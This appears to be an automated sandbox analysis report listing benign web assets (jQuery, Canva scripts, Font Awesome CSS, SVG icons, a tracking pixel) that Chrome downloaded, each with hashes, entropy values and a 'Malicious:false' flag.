                                                                                                                                                                                                                                                                    Entropy (8bit):5.057139114226128
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:rnadKr/Ypf7W1wagtLJxqLy:rQKEM1wB5JH
                                                                                                                                                                                                                                                                    MD5:B3372B8D38EE3335FDC263C0B44AD4C6
                                                                                                                                                                                                                                                                    SHA1:7849E59CCC49B6CDA73E1100F49648426B2797C5
                                                                                                                                                                                                                                                                    SHA-256:4AF5CAC9D2650B11968A5E6589C97F114A91FF1443119DEA8179893FD94FBF52
                                                                                                                                                                                                                                                                    SHA-512:DB2DA19F9917BA524F414D8C64FA2C29F3323C4C917C9E79AC1027767DCF0B3A972ABE58EACF4C3E0B52F23D7570D94F6D93E04D0169B323FD5103F3A9C9B928
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/111dc8963cac940b.ltr.css
                                                                                                                                                                                                                                                                    Preview:.CzrZcQ{display:none}./*# sourceMappingURL=sourcemaps/111dc8963cac940b.ltr.css.map*/
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32030)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):86709
                                                                                                                                                                                                                                                                    Entropy (8bit):5.367391365596119
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
                                                                                                                                                                                                                                                                    MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                                                                                                                                                                                                                    SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                                                                                                                                                                                                                    SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                                                                                                                                                                                                                    SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (953)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):9796
                                                                                                                                                                                                                                                                    Entropy (8bit):5.733929903802842
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:F93WtS7Baq9zWOxY6WqZFh7QLAwIQv7rdtT/SPB1jVyIL1My9urqkdR:F9mtS7BafT6WqZkL9jjJZSPB1jVyIurR
                                                                                                                                                                                                                                                                    MD5:B5FB8D5067F40CB9CC45AD4C09F97A47
                                                                                                                                                                                                                                                                    SHA1:DA4A9739D3D463919FD44E01B3891ACC0B01A614
                                                                                                                                                                                                                                                                    SHA-256:1CA6C95281E51C86604E7F879572BCE17DF197F370717A8A568A614F89ECCF56
                                                                                                                                                                                                                                                                    SHA-512:3F42888FC9E2B697DA5AC999A5F7D3EF1EC0514B4748B99D2A57AECED4E4BC33C4746FDAD2D624B99DCC6E4443716A1BABC5A3BA637A918E0A8DE45B06FF157F
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/a121920226a20c53.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6499],{../***/ 293763:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var t=__c.t;var Mv;var Jv;var Iv;var FLa,Wv,GLa,Xv,ELa,JLa;.__c.Lv=function(a){if(a.match(zLa))return Iv.qk(a);if(a.match(ALa)){var b=ALa.exec(a);if(!b)throw Error(`invalid hexadecimal triplet color: ${a}`);return new Jv(parseInt(b[1]+b[1],16),parseInt(b[2]+b[2],16),parseInt(b[3]+b[3],16))}if(a.match(BLa))return Iv.dW(a);if(a.match(CLa))return Iv.Kda(a);if(a.match(DLa)){b=a.match(DLa);if(!b)throw Error(`invalid hsla color: ${a}`);const [d,e,f]=[b[2],b[4],b[6]];var c=b[8].length?b[8]:"1";a=parseFloat(d)/360;b=parseFloat(e.substring(0,e.length-1))/100;const g=.parseFloat(f.substring(0,f.length-1))/100;c=parseFloat(c);const [h,k,l]=ELa([a,b,g]);
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):368
                                                                                                                                                                                                                                                                    Entropy (8bit):4.546742488437108
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6:tI9mc4sl3WfR9F37qCdzU4jQT1m9etUNq1RQv7HD6DVJOp0zjyA0mI4YLJ5TDh:t41WffF37vdz3QT49etN127gtvb0mE/x
                                                                                                                                                                                                                                                                    MD5:0483F2B648DCC986D01385062052AE1C
                                                                                                                                                                                                                                                                    SHA1:61BD815F1497863265A76D92623042835E5E7FE2
                                                                                                                                                                                                                                                                    SHA-256:09A743EE0C32CA57C9BE64B13B29C396310D1DD309CB4D7D3BE722E47DB95F27
                                                                                                                                                                                                                                                                    SHA-512:359F9BCC2441DC48FFBE69353BB7D4143A2037B0263BD5F0CFB06B14D5F15D9A6E574930E88A84081C61698BF3E2F5333BF9081865183AA7F9202AAC078C10FF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/0483f2b648dcc986d01385062052ae1c.svg
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#DD2E44" d="M35.885 11.833c0-5.45-4.418-9.868-9.867-9.868-3.308 0-6.227 1.633-8.018 4.129-1.791-2.496-4.71-4.129-8.017-4.129-5.45 0-9.868 4.417-9.868 9.868 0 .772.098 1.52.266 2.241C1.751 22.587 11.216 31.568 18 34.034c6.783-2.466 16.249-11.447 17.617-19.959.17-.721.268-1.469.268-2.242z"/></svg>
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                                                    Entropy (8bit):5.232749009485403
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:kjhskjmosAyqnwf0Hz0oW0+NNJ2yQGGi7yQGGnXdlJVrvyQGGiO:kjhskjmzAyqwsHAoW0gmydB7ydkJlvya
                                                                                                                                                                                                                                                                    MD5:C0B2A76C1E93F5E6F8456BB938D2D403
                                                                                                                                                                                                                                                                    SHA1:2B3CEAA183DAE2C0E83BF94877A8A66FB4853C78
                                                                                                                                                                                                                                                                    SHA-256:B2E5D86D975FD3B8A3CBB0A0BC136749FC765692CE4825E660EA1C4E02735E0A
                                                                                                                                                                                                                                                                    SHA-512:94B9DBDF047107BCBF0C88BE127F435D6BAD2D3DD2FBF005F6C536EDDA6FFB23A895310AC0AB4141A36408C478C9396EF989AA3763AC3716C44005D54FEC1253
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2141],{../***/ 240224:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {.}).call(self, self._45f7853dc7660378a038952b53c0953e);}..}])
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1525
                                                                                                                                                                                                                                                                    Entropy (8bit):4.359418865415674
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:t41Ri5D1JURsYbz3QHcchcNq2tkJzvEL16squq3qcEgtNibpq5S+2OV/LvBe8rTd:CsTJnoLdk1Eg7llEuN8M5SjKBeM31dy+
                                                                                                                                                                                                                                                                    MD5:8777E8ED572C4159D71B08CCA2972B15
                                                                                                                                                                                                                                                                    SHA1:2A57B1E6F2667BA1364CF459161FB868B53C37B8
                                                                                                                                                                                                                                                                    SHA-256:E1795BC184F97F29790C807FC91C70846D221904576727698728271D7071F268
                                                                                                                                                                                                                                                                    SHA-512:43276A2282A1B088AF417B61942B880253F9D1FCDFFF802F2EBD5BE935D4A708C2AA90842247147D5274CDE52D2B06B5659A607593925822539D6985AE84CFD0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/8777e8ed572c4159d71b08cca2972b15.svg
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><circle fill="#FFCB4C" cx="18" cy="17.018" r="17"/><path fill="#65471B" d="M14.524 21.036a.914.914 0 0 1-.312-.464.799.799 0 0 1 .59-1.021c4.528-1.021 7.577 1.363 7.706 1.465.384.306.459.845.173 1.205-.286.358-.828.401-1.211.097-.11-.084-2.523-1.923-6.182-1.098a.91.91 0 0 1-.764-.184z"/><ellipse fill="#65471B" cx="13.119" cy="11.174" rx="2.125" ry="2.656"/><ellipse fill="#65471B" cx="24.375" cy="12.236" rx="2.125" ry="2.656"/><path fill="#F19020" d="M17.276 35.149s1.265-.411 1.429-1.352c.173-.972-.624-1.167-.624-1.167s1.041-.208 1.172-1.376c.123-1.101-.861-1.363-.861-1.363s.97-.4 1.016-1.539c.038-.959-.995-1.428-.995-1.428s5.038-1.221 5.556-1.341c.516-.12 1.32-.615 1.069-1.694-.249-1.08-1.204-1.118-1.697-1.003-.494.115-6.744 1.566-8.9 2.068l-1.439.334c-.54.127-.785-.11-.404-.512.508-.536.833-1.129.946-2.113.119-1.035-.232-2.313-.433-2.809-.374-.921-1.005-1.649-1.734-1.899-1.137-.39-1.945.321-1.542 1.561.604 1.854.208 3.375-.83
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5138)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):158080
                                                                                                                                                                                                                                                                    Entropy (8bit):5.718598188027346
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:CcipKBNwjdgr66mkgBEh3IdOUFAXg6qjSU1eza6BsU2VmdKnwKluy:CcipKBNwjdgr66mkcEh3IkvPYSU1aBsX
                                                                                                                                                                                                                                                                    MD5:750703F7D42E2FE0F2FC289CDC8AA4DB
                                                                                                                                                                                                                                                                    SHA1:D6D61FE93BE9C66E9FC58BB62E43C0640EF3BBDB
                                                                                                                                                                                                                                                                    SHA-256:871018C0C50557AB8A2C0D4C69DD09457E607119CBE6F750B9412C97A84897EF
                                                                                                                                                                                                                                                                    SHA-512:D95298C55CEB2866553BACE2DC1F894B777715DCB7F7DD9235031F59FF2CE26EA9A39CA03DAE913C33956096FDA98A66694D59CB2A3053AEF52EB37931E088D9
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/7aa7a229de4ac1cc.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 813110:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var Eh;var Og;var fh;var $g;var Pa;var Uf;var Rf;var nf;var Ne;var Le;var te;var se;var Yd;var od;var sd;var $c;var hd;var cd;var gd;var G;var ad;var T;var E;var Za;var K;var Yc;var Zc;var bd;var Q;var D;var Nc;var O;var id;var Oa;var Na;var W;var L;var M;var ca;var Sc;var uc;var tc;var mc;var nb;var A;var ab;var Ka;var B;var t;.var baa,ha,ia,ka,ua,eaa,jaa,iaa,haa,gaa,maa,oaa,paa,qaa,Ga,Ia,La,Ma,raa,Wa,vaa,uaa,Ra,Sa,Ta,Va,Xa,Qa,saa,taa,ib,Daa,Faa,ob,Haa,Iaa,Jaa,pb,Maa,Naa,xb,vb,Zaa,Vaa,$aa,Raa,Cb,iba,nba,rba,qba,sba,oba,vba,Jb,wba,xba,Lb,Aba,Bba,Cba,Dba,Eba,Fba,Gba,Hba,Iba,Kba,Jb
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (54926)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):55111
                                                                                                                                                                                                                                                                    Entropy (8bit):4.7118090605418175
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:guC31UP18Pq4/vnU63HJXkQCZ/WMQyjJKX719sGsQz5:gu5PWC4/vzH5BCkgc7zsiF
                                                                                                                                                                                                                                                                    MD5:E4C542A7F6BF6F74FDD8CDF6E8096396
                                                                                                                                                                                                                                                                    SHA1:3A0571A695A35F238026B9398386DC99D9A0C56D
                                                                                                                                                                                                                                                                    SHA-256:EEB17A45A48ACA1D7ADBCF04DE155DCD0B47CB36AD036310446BB471FEA9AAA3
                                                                                                                                                                                                                                                                    SHA-512:80C8D07836842C9D2BC8223E16D22DBAC53D3240227C265C1AAEFCF45AF3922338F43F256C38686946885F8012535F3BC287CC3658012787246EB5CCF6C13A3E
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://use.fontawesome.com/releases/v5.8.1/css/all.css
                                                                                                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 5.8.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-lef
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2881)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):219912
                                                                                                                                                                                                                                                                    Entropy (8bit):5.723303311793263
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:F+38a9esABybAfPp0aaUKhxyegrGgWwzqyPqw03OLf+r68vsVjzb2WZh9CRD9Q8x:F+38a9esABi/cWwzqyPqw03OLf+tvsVk
                                                                                                                                                                                                                                                                    MD5:B8024E96A21BE90DB7DDA2E9AAB1B1C3
                                                                                                                                                                                                                                                                    SHA1:F1A41AFCFEB0C12309EDCF8F734026EF030AB26A
                                                                                                                                                                                                                                                                    SHA-256:7626ED74B0A704BAE367DD944093322583959A0F58214F5ADAB3774E6C4FA84B
                                                                                                                                                                                                                                                                    SHA-512:CB40AFA3EE0D13504CF3782DBFDD3E4375E17FEEBE6A2A9171D87D3B7BC813BDBA6604C9C485E420E00A7756F3A792086A8D0D8E60B78FB4F27BDDA0AF8DC5FF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/3e1e05ba24ee6f70.js+6d0e69feb99e4a90.js+60f63b285a3b4847.js+b2bb61a849e48145.js+c8a97d58e80df6e6.js+b68cf68769865eb5.js+edabeea6215279ba.js+131eb4392c201a0d.js+217c7ff3fe127f37.js+c2b308fb492f8999.js+bd755f9837164721.js+896e1adda18e46a3.js
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:3e1e05ba24ee6f70.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9976],{../***/ 376699:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(79194);__web_req__(912002);__web_req__(68864);__web_req__(46127);__web_req__(121446);__web_req__(772112);__web_req__(17726);__web_req__(139504);__web_req__(224868);__web_req__(629056);__web_req__(131660);__web_req__(694173);__web_req__(923631);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var rb=__c.rb;var Bb=__c.Bb;var ww=__c.ww;var di=__c.di;var P=__c.P;var GB=__c.GB;var CB=__c.CB;var A=__c.A;var yB=__c.yB;var B=__c.B;var O=__c.O;.var jYc=function(a){switch(a){case 4:return O("9ND0kg");case 2:return O("ibdecg");case 7:return O("446quA");case 5:return O("j1fbqg");case 1:return O("O5i4AQ");case 6:return O("C0VHsg");case 3:return O(
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://adservice.google.com/ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor
                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65311)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):418962
                                                                                                                                                                                                                                                                    Entropy (8bit):5.4140291911106795
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12288:JkmwnouZA7UMJK3imf9Wdn5ZFyTvcGrYzqZh+TscGLruDmg2/hG1y:JsnouZArk3FVWdn5ZFyTvcGrYzqZh+TU
                                                                                                                                                                                                                                                                    MD5:74774747B99F5DEC64505A1E8A9AF3AF
                                                                                                                                                                                                                                                                    SHA1:AAB49AFE2294CDA7106E62A87275A5341A4836DD
                                                                                                                                                                                                                                                                    SHA-256:9A1189DDECC87CEFAF1EE87A69C19392FB9E125219381C374036534F1AFB2A61
                                                                                                                                                                                                                                                                    SHA-512:8D9BDC31D0DDF0668D4EFB0EDDA11ABFE73D22F91CF87385FEBC77F5D110E5A03B46288D7FE29A0A3661832AA69D382E8EB08A5E886331FAE51FB49D8CAD7630
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*! For license information please see ad9231ed6706fadf.vendor.js.LICENSE.txt */.(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{907554:(e,t,n)=>{!function(){var e="undefined"!=typeof window?window:n.g,r={};for(var i in function(e,t,n){var r;function a(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}var o="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e};var s=function(n){n=["object"==typeof globalThis&&globalThis,n,"object"==typeof e&&e,"object"==typeof self&&self,"object"==typeof t&&t];for(var r=0;r<n.length;++r){var i=n[r];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function u(e,t){if(t)e:{var n=s;e=e.split(".");for(var r=0;r<e.length-1;r++){var i=e[r];if(!(i in n))break e;n=n[i]}(t=t(r=n[e=e[e.length-1]]))!=r&&null!=t&&o(n,e,{configurable:!0,writable:!0,value:t})}}function c(e){return(e={next:e}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10479)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):24352
                                                                                                                                                                                                                                                                    Entropy (8bit):5.684419390940329
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:Ndo5l/JHl1+sB/gqosP0dfkfchY5Hsld6wQZN+jp4S/ZN97BWi2il:N25pJHl5B/P+hqMld6wQH+Nf/ZzUi2il
                                                                                                                                                                                                                                                                    MD5:B6BD953D37AA2EC727EAC3CFE20081DE
                                                                                                                                                                                                                                                                    SHA1:F814EA28F1D7D4AA27330E18DFBD156758811568
                                                                                                                                                                                                                                                                    SHA-256:A0199686F6F843EFFB32B45E8E6DB4AB940BB32CCC7224399FF5BAB3B0DC7022
                                                                                                                                                                                                                                                                    SHA-512:FF1496DF41A237CBDEF6197D890DEE88F7BDB3CB525A3E75A1EFB3BBEC4D514DE4A6221DA33344AD1F72FD30DBE0D187E7952ED7ACBCB2379AA872CB7E243E69
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9630],{../***/ 79194:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Li;var sqa,tqa,uqa,vi,wi,xi,yi,zi,vqa,yqa,wqa,zqa,xqa,Fi,Bqa;sqa=function(a){return(null==a?0:null!=a.D1)?a.D1():a};__c.ri=function(a){if(null==a||null==a.D1)return a;a=a.D1();return a instanceof HTMLElement?a:null};.__c.si=function(a,{Zp:b}){const [c,d]=(0,__c.Kc)(null),e=__c.cb().direction;(0,__c.Jc)(()=>{const f=__c.ri(c);if(f){var g=new __c.Id(f,{Aea:!b});a.forEach(([h,k,l])=>{h=__c.lb(h,e);h.GQa=null===l||void 0===l?void 0:l.GQa;"function"===typeof k?g.addListener("keydown",h,k):(k.Zva&&g.addListener("keydown",h,k.Zva),k.lfa&&g.addListener("keyup",h,k.lfa),k.$va&&g.addListener("keypress",h,k.$va))});return()=>{g.reset()}}},[e,b,a,c]);
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):20
                                                                                                                                                                                                                                                                    Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:YMb1gXMjHYn:YMeX2Yn
                                                                                                                                                                                                                                                                    MD5:FDDC31DE967A4B3DA76393419B55F9C9
                                                                                                                                                                                                                                                                    SHA1:286EFCC8CE25D3155D352AAB208056B0EE3009EA
                                                                                                                                                                                                                                                                    SHA-256:DB7DE230E919C4DAD9B3F2599BB09E36DB4D3DECCB86AB3577E9EA1CDBDC5E1F
                                                                                                                                                                                                                                                                    SHA-512:E27F55BD7A48B5CBA9B4A244507B409690555B277BCDFF1DEC5DE3CE76B2D43EB3BE2DA958C1BBD90E6375AEAD14C9E996DC7EE9298D70D698458702CB13C93A
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:{"ip":"8.46.123.75"}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1303)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2229
                                                                                                                                                                                                                                                                    Entropy (8bit):5.623557699395298
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:AOAo0AyD7yX0MGbUvn5GbCi4FT+/Z/M9iOMs1VVtCNOQQq9FWXVy3:uzAvPw/ps1TtMou
                                                                                                                                                                                                                                                                    MD5:B852C7982F102B1FA252FC1A2E5F1356
                                                                                                                                                                                                                                                                    SHA1:013E1538DF0E5D3498C4A8FAEEFACA1452CA6A29
                                                                                                                                                                                                                                                                    SHA-256:1A16EFE77C735AE53E59A8736C6114C6ECE373CF94DDD9A87BE91C4FC729DAE4
                                                                                                                                                                                                                                                                    SHA-512:2061288FE6257C97319F49B2EE56F8ED10B7BB3399757D6A3BB9F29E0394DD70DFF5B439340171388C75FABA11B512518DD6492096835D72D06E780BACEC3297
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
